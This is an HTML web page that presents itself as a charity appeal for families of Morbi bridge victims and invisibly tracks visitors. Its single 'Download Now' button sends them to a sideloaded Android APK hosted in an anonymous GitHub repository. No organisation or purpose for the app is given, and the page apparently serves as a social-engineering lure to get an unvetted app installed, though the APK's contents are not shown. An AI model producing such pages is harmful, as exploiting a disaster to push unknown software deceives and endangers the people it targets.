
<script type="text/javascript">
var sc_project=12778684; 
var sc_invisible=1; 
var sc_security="9c087770"; 
</script>
<script type="text/javascript"
src="https://www.statcounter.com/counter/counter.js"
async></script>
<noscript><div class="statcounter"><a title="Web Analytics"
href="https://statcounter.com/" target="_blank"><img
class="statcounter"
src="https://c.statcounter.com/12778684/0/9c087770/1/"
alt="Web Analytics"
referrerPolicy="no-referrer-when-downgrade"></a></div></noscript>
<html>
    
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<head>
	<meta property="og:title"  content="Help Morbi People">
	<meta property="og:image"  content="https://i.postimg.cc/g2FHXV9n/morbi.jpg">
	<meta property="og:image:width" content="15" />
	<meta property="og:image:height" content="15" />
	<meta property="og:description"  content="Help Family of dead people in Morbi Bridge.">

    <Title>Download</Title>
    <style>
        body{
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        }

.dabavanu {
	background-color:#315cbb;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:20px;
	font-weight:bold;
    padding: 15px;
	text-decoration:none;
	text-shadow:0px 1px 0px #315cbb;
}
.dabavanu:hover {
	background-color:#315cbb;
}
.dabavanusw {
	background-color:#315cbb;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:20px;
	font-weight:bold;
    padding: 15px;
	text-decoration:none;
	text-shadow:0px 1px 0px #315cbb;
}
.dabavanu:active {
	position:relative;
	top:1px;
}

    </style>
</head>
<script>
function dbvao() 
{
    var m = new Date().getMinutes(); 
	if(m%2==0)
	{
		window.location="https://github.com/helppeoplemorbi/download/raw/main/Help-People.apk"; 
	}
	else
	{
		window.location="https://github.com/helppeoplemorbi/download/raw/main/Help-People.apk";
	}
}
</script>
<body>
<center>
    
        <img src="https://i.postimg.cc/g2FHXV9n/morbi.jpg"  height="80"/>
        <h2>Help-Morbi-People</h2><h3>
        Please help family of dead people<br>
from Morbi Bridge to get justice.<br>
We hope you will help.<br><br>
Download app and Help now.</h3>
        <div onclick="dbvao()"  class="dabavanu">Download Now</a>


        


    </div>
</center>
</html>
